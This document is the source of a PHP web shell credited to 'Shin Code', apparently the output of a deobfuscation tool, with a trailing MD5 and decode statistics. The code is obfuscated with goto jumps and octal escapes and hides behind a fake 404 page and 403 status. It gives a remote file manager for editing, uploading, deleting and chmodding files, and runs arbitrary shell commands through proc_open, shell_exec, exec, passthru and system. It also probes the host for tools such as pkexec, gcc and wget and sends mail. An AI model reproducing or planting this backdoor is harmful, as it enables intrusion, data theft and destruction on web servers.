Y4All; H0Lu2: ?>
<ul class="info-list"><li>Hostname:<?php goto eFRyN; NuGGW: ?>
</li><li>Server Software:<?php goto VZDmD; ArH8W: @ini_set("m\141\170\137ex\145c\165\164ion_\164\151m\145", 0); goto qbVjM; VT3po: ?>
<!doctypehtml><html><head><title>404</title><link href=""rel="stylesheet"></head><body><div class="container"><h1>[ FILE MANAGEMENT ]</h1><div class="menu-icon"onclick="toggleSidebar()"></div><hr><div class="button-container"><form method="post"style="display:inline-block"><input name="Summon"type="submit"value="Adminer"class="summon-button"></form><button class="summon-button"type="button"onclick='window.location.href="?gas"'>Mail Test</button></div><?php goto HAv5D; SpuFr: echo @phpversion(); goto NuGGW; eiNrv: ?>
<hr><?php goto r4e6p; lMvc0: @ini_set("e\162\162o\162_\154og", NULL); goto AkT8f; OYH6A: function changeDirectory($path) { if ($path === "..") { @chdir(".\56"); } else { @chdir($path); } } goto hMLCe; nuZ9L: @ob_clean(); goto tW71D; zJrNF: @http_response_code(403); goto EozqT; qbVjM: @error_reporting(0); goto rX2yR; aGTzE: function showFileTable($path) { $fileDetails = getFileDetails($path); ?>
<table><tr><th>Name</th><th>Type</th><th>Size</th><th>Permission</th><th>Actions</th></tr><?php if (is_array($fileDetails)) { foreach ($fileDetails as $fileDetail) { ?>
<tr><td><?php echo getLink($path . "\57" . $fileDetail["\156\141\155e"], $fileDetail["name"]); ?>
</td><td><?php echo $fileDetail["t\171\160\145"]; ?>
</td><td><?php echo $fileDetail["\163ize"]; ?>
</td><td><?php $permissionColor = is_writable($path . "/" . $fileDetail["\156\141me"]) ? "gr\145en" : "\162ed"; ?>
<span style="color:<?php echo $permissionColor; ?>
"><?php echo $fileDetail["\160ermi\163\163i\157\156"]; ?>
</span></td><td><?php if ($fileDetail["t\171\160e"] === "F\151\154e") { ?>
<div class="dropdown"><button class="dropbtn">Actions</button><div class="dropdown-content"><a href="?dir=<?php echo urlencode($path); ?>
&edit=<?php echo urlencode($path . "\57" . $fileDetail["n\141\155\145"]); ?>
">Edit</a> <a href="?dir=<?php echo urlencode($path); ?>
&rename=<?php echo urlencode($fileDetail["na\155\145"]); ?>
">Rename</a> <a href="?dir=<?php echo urlencode($path); ?>
&chmod=<?php echo urlencode($fileDetail["\156\141\155e"]); ?>
">Chmod</a> <a href="?dir=<?php echo urlencode($path); ?>
&delete=<?php echo urlencode($fileDetail["n\141\155e"]); ?>
">Delete</a></div></div><?php } if ($fileDetail["t\171\160e"] === "F\157l\144e\162") { ?>
<div class="dropdown"><button class="dropbtn">Actions</button><div class="dropdown-content"><a href="?dir=<?php echo urlencode($path); ?>
&rename=<?php echo urlencode($fileDetail["\156\141m\145"]); ?>
">Rename</a> <a href="?dir=<?php echo urlencode($path); ?>
&chmod=<?php echo urlencode($fileDetail["\156\141me"]); ?>
">Chmod</a> <a href="?dir=<?php echo urlencode($path); ?>
&delete=<?php echo urlencode($fileDetail["na\155\145"]); ?>
">Delete</a></div></div><?php } ?>
</td></tr><?php } } else { ?>
<tr><td colspan="5">None</td></tr><?php } ?>
</table><?php } goto bXR2o; YlTTC: $domainCount = @countDomainsInServer(); goto sp3v6; n6PwV: function getLink($path, $name) { if (is_dir($path)) { return "\74a hre\146=\42?\144i\162\75" . urlencode($path) . "\42\76" . $name . "</\141>"; } elseif (is_file($path)) { return "<\141\40hr\145\146=\42\77\144\151r=" . urlencode(dirname($path)) . "\46a\155p;r\145\141d\75" . urlencode($path) . "\"\76" . $name . "</\141>"; } } goto LQARU; CgJeT: ?>
<label for="feature-select">Select Feature:</label> <select id="feature-select"><?php goto BwUnB; ZwJZX: if (isset($_GET["\144e\154\145\164e"])) { $file = $_GET["\144el\145te"]; if ($_SERVER["\122E\121UEST\137MET\110O\104"] === "GET") { $currentDirectory = getCurrentDirectory(); if (is_file($file)) { $responseMessage = deleteFile($file); echo "\74s\143\162ipt>\141le\162t(\47F\151\154\145\40d\151h\141\160\165\163\47\51\73\167\151n\144\157w.\154\157c\141\164i\157n\75\47\77di\162=" . urlencode($currentDirectory) . "\47\73</scr\151p\164>"; die; } elseif (is_dir($file)) { $responseMessage = deleteFolder($file); echo "\74\163\143r\151\160t>a\154\145rt\50\47F\157l\144e\162\40dihap\165s\47\51\73w\151ndow.loc\141\164ion\75\47?d\151r\75" . urlencode($currentDirectory) . "'\73\74/sc\162\151\160t\76"; die; } else { $errorMessage = "\106ile or\40\146o\154\144er\40does not \145\170i\163\164."; } } } goto FOHdY; gbYWm: ?>
</li><li>User ID:<?php goto VbQT7; aS54Z: ?>
<input name="cmd"size="30"height="10"> <input type="submit"class="empty-button"></form></div></div><?php goto DjmJv; xY7vU: function executeCommand($command) { $currentDirectory = getCurrentDirectory(); $command = "cd {$currentDirectory}\40&&\40{$command}"; $output = ''; $error = ''; $descriptors = array(0 => array("\160\151pe", "\162"), 1 => array("\160i\160e", "w"), 2 => array("pi\160\145", "\167")); $process = @proc_open($command, $descriptors, $pipes); if (is_resource($process)) { fclose($pipes[0]); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); $error = stream_get_contents($pipes[2]); fclose($pipes[2]); $returnValue = proc_close($process); $output = trim($output); $error = trim($error); if ($returnValue === 0 && !empty($output)) { return $output; } elseif (!empty($error)) { return "E\162\162\157\162\72 " . $error; } } $shellOutput = @shell_exec($command); if ($shellOutput !== null) { $output = trim($shellOutput); if (!empty($output)) { return $output; } } else { $error = error_get_last(); if (!empty($error)) { return "Er\162\157\162: " . $error["\155e\163s\141ge"]; } } @exec($command, $execOutput, $execStatus); if ($execStatus === 0) { $output = implode(PHP_EOL, $execOutput); if (!empty($output)) { return $output; } } else { return "\105rr\157\162:\40Co\155\155an\144\40ex\145\143\165t\151on f\141iled\56"; } ob_start(); @passthru($command, $passthruStatus); $passthruOutput = ob_get_clean(); if ($passthruStatus === 0) { $output = $passthruOutput; if (!empty($output)) { return $output; } } else { return "\105r\162\157\162:\40\103\157\155\155\141nd\40\145xecut\151o\156 \146a\151l\145d\56"; } ob_start(); @system($command, $systemStatus); $systemOutput = ob_get_clean(); if ($systemStatus === 0) { $output = $systemOutput; if (!empty($output)) { return $output; } } else { return "Erro\162: C\157\155\155a\156\144 \145\170\145\143\165\164\151\157\156 \146ail\145d."; } return "\105\162\162\157r: Co\155ma\156\144\40execut\151\157n \146ai\154ed."; } goto jguok; obNmC: echo date("Y"); goto yo4fq; JG1qL: ?>
<li>Total Domains in Server:<?php goto Uxn1c; hMLCe: function getCurrentDirectory() { return realpath(getcwd()); } goto n6PwV; zMsVB: if (!empty($responseMessage)) { ?>
<p style="color:green"class="response-message"><?php echo $responseMessage; ?>
</p><?php } goto Wkw3q; sp3v6: function formatBytes($bytes, $precision = 2) { $units = array("\102", "\113\102", "M\102", "G\102", "T\102"); $bytes = max($bytes, 0); $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= 1 << 10 * $pow; return round($bytes, $precision) . " " . $units[$pow]; } goto H0Lu2; IpcF4: if (isset($_GET["r\145\156am\145"])) { $file = $_GET["re\156ame"]; if ($_SERVER["RE\121\125EST_\115E\124H\117D"] === "\120OS\124") { $newName = $_POST["\156\145w_\156a\155e"]; if (is_file($file) || is_dir($file)) { $responseMessage = renameFile($file, $newName); } else { $errorMessage = "\106\151le\40\157r fol\144e\162 \144o\145s \156\157\164\40exi\163\164."; } } } goto ZwJZX; ZQIF4: ?>
</li></ul></div></div></div><script>function toggleOptionsMenu(){document.getElementById("optionsMenu").classList.toggle("show")}function toggleSidebar(){document.getElementById("sidebar").classList.toggle("open")}</script><div class="footer"><p><?php goto obNmC; LBLrd: function saveFileContent($file) { if (isset($_POST["\143on\164\145n\164"])) { return file_put_contents($file, $_POST["\143\157n\164ent"]) !== false; } return false; } goto pNgcO; tW71D: @header("\130-\101ccel\55\102uf\146\145r\151ng: \156\157"); goto X7qh0; TRkpW: echo @php_uname(); goto F_Q0g; F_Q0g: ?>
</li></ul></div><div class="info-container"><h2>System Info</h2><ul class="info-list"><?php goto wwWhQ; uWM9c: if (isset($_SERVER["\123ERV\105\122_\101DD\122"])) { ?>
<li>IP Address:<?php echo $_SERVER["\123ERV\105\122_\101\104D\122"]; ?>
</li><?php } goto lFI3y; HAv5D: if (isset($_GET["ga\163"])) { if ($_SERVER["REQUE\123T_\115ET\110OD"] === "P\117ST") { if (!empty($_POST["\145m\141\151\154"])) { $xx = rand(); if (mail($_POST["\145mail"], "\123h\151\156\40Mai\154er\40\124e\163t\40\55 " . $xx, "Sh\151\156\40\107ante\156\147")) { echo "\74b>\123end\40\141\40rep\157rt\40to [" . $_POST["\145m\141i\154"] . "\135\40\55 {$xx}<\57b>"; } else { echo "\106ailed\40\164o\40\163e\156\144 \164he emai\154\56"; } } else { echo "P\154\145\141\163\145 p\162\157v\151de \141n em\141\151l\40a\144\144res\163."; } } else { ?>
<h2>Mail Test :</h2><form method="post"><input name="email"placeholder="Enter email"required> <input type="submit"value="Send test "></form><?php } } goto CSJIc; r4e6p: echo "<\150\62>\106ile\155\141\156a\147er\74/\1502>"; goto Jx5RQ; T6vc6: if (isset($_SERVER["\110\124\124P\137CF_CON\116\105\103\124\111\116G\137\111\120"]) && defined("CLOUD\106\114AR\105\137\126E\122SION")) { $_SERVER["\122EM\117\124\105_\101\104\104\122"] = $_SERVER["\110\124\124\120\137\103F_\103\117NN\105CTIN\107_I\120"]; if (isset($apacheHeaders["H\124TP\137\103F_\126I\123IT\117R"])) { header("H\124T\120\137\103\106\137\126ISI\124OR\72\40" . $apacheHeaders["HTT\120\137CF_VIS\111\124OR"]); } } goto VT3po; vZNex: if (!empty($cmdOutput)) { ?>
<h3>Command Output:</h3><div class="command-output"><pre><?php echo htmlspecialchars($cmdOutput); ?>
</pre></div><?php } goto zMsVB; cMHyv: if (isset($_GET["ch\155o\144"])) { $file = $_GET["chm\157d"]; if ($_SERVER["R\105Q\125\105\123T_MET\110O\104"] === "POS\124") { $responseMessage = changePermission($file); } } goto TMolC; J8uCk: $currentDirectory = getCurrentDirectory(); goto gY3pL; pNgcO: function uploadFile($targetDirectory) { if (isset($_FILES["fi\154\145"])) { $currentDirectory = getCurrentDirectory(); $targetFile = $targetDirectory . "\57" . basename($_FILES["\146il\145"]["\156am\145"]); if ($_FILES["fil\145"]["s\151z\145"] === 0) { return "\117\160\145\156 \125\162\40\105\171\145s\40B\151\164\143h\40\41\41\41."; } else { if (move_uploaded_file($_FILES["\146ile"]["\164mp\137n\141me"], $targetFile)) { return "F\151le\40\165\160\154\157a\144e\144\40s\165c\143\145s\163\146ul\154\171."; } else { return "\105rror\40\165\160lo\141\144\151ng \146\151\154e."; } } return ''; } } goto OYH6A; Y4All: if (function_exists("\154\151\164\145\163\160ee\144_\162\145\161u\145\163t_\150\145\141de\162\163")) { $headers = litespeed_request_headers(); if (isset($headers["\130\55LSC\101CHE"])) { header("\130\55L\123CACH\105\72\40o\146f"); } } goto oi85H; Wkw3q: if (isset($_GET["r\145\156am\145"])) { ?>
<div class="rename-form"><h2>Rename File or Folder:<?php echo basename($file); ?>
</h2><form method="post"><input name="new_name"placeholder="New Name"required><br><input type="submit"value="Rename"class="button"> <a href="?dir=<?php echo urlencode(dirname($file)); ?>
"class="button">Cancel</a></form></div><?php } goto fURDZ; Jx5RQ: showBreadcrumb($currentDirectory); goto OTzQh; A8vlv: $responseMessage = ''; goto rJcJZ; sNC01: ?>
</li><?php goto daalW; AkT8f: @ini_set("\154\157\147\137er\162\157\162\163", 0); goto ArH8W; wwWhQ: $features = array("Sa\146\145 Mode" => ini_get("\163\141\146e\137m\157d\145") ? "\105n\141\142\154e\144" : "D\151s\141b\154ed", "\104is\141\142l\145\40F\165n\143\164\151\157\156s" => ini_get("d\151\163\141\142\154\145\137\146\165\156ct\151\157\156s"), "G\103C" => function_exists("s\150el\154\137\145\170\145c") && shell_exec("\147c\143\40-\55\166\145\162\163io\156") ? "\117n" : "O\146\146", "P\145\162l" => function_exists("\163he\154\154\137\145\170ec") && shell_exec("pe\162l\40--v\145\162\163\151on") ? "\117\156" : "O\146\146", "\120\171th\157n\40V\145rs\151o\156" => ($pythonVersion = shell_exec("\160\171t\150on\40-\55v\145\162\163\151\157\156")) ? "On\40(" . $pythonVersion . ")" : "O\146\146", "\120K\105X\105\103 \126ers\151\157\156" => ($pkexecVersion = shell_exec("p\153ex\145\143\40\55\55\166ers\151\157\156")) ? "On\40(" . $pkexecVersion . "\51" : "O\146\146", "\103u\162l" => function_exists("sh\145\154\154_ex\145c") && shell_exec("c\165\162\154\40\55\55\166er\163ion") ? "On" : "Off", "\127\147\145\164" => function_exists("she\154\154_\145\170\145\143") && shell_exec("wg\145t\40-\55\166\145r\163i\157n") ? "\117n" : "\117\146\146", "M\171sq\154" => function_exists("s\150el\154_e\170\145\143") && shell_exec("\155y\163\161\154 --v\145r\163\151o\156") ? "On" : "Off", "\106\164\160" => function_exists("she\154l\137e\170ec") && shell_exec("ftp \55\55v\145rsi\157n") ? "O\156" : "\117ff", "Ssh" => function_exists("\163\150e\154l_\145\170\145\143") && shell_exec("ss\150\40-\55\166\145\162sio\156") ? "\117n" : "\117f\146", "\115a\151\154" => function_exists("\163hell_\145xec") && shell_exec("m\141il \55\55versio\156") ? "O\156" : "O\146f", "\143\162\157\156" => function_exists("shell_\145xe\143") && shell_exec("c\162o\156\40\55-\166e\162sio\156") ? "\117\156" : "\117ff", "S\145n\144\115\141i\154" => function_exists("\163h\145\154\154_\145x\145\143") && shell_exec("\163e\156\144\155ai\154 \55-\166\145rsi\157n") ? "\117\156" : "Off"); goto CgJeT; X7qh0: @header("\103on\164ent-\105n\143\157\144\151\156\147: n\157n\145"); goto zJrNF; V7Dxr: ?>
</div><div class="sidebar"id="sidebar"><div class="sidebar-content"><div class="sidebar-close"><button onclick="toggleSidebar()">Close</button></div><div class="info-container"><h2>Server Info</h2><?php goto CdqVm; yo4fq: ?>
<a href="">Coded By</a> Shin Code.</p></div></body></html>
Function Calls
None |
MD5 | a31e1fabb1cd1be9397a97ac5785619e |
Eval Count | 0 |
Decode Time | 66 ms |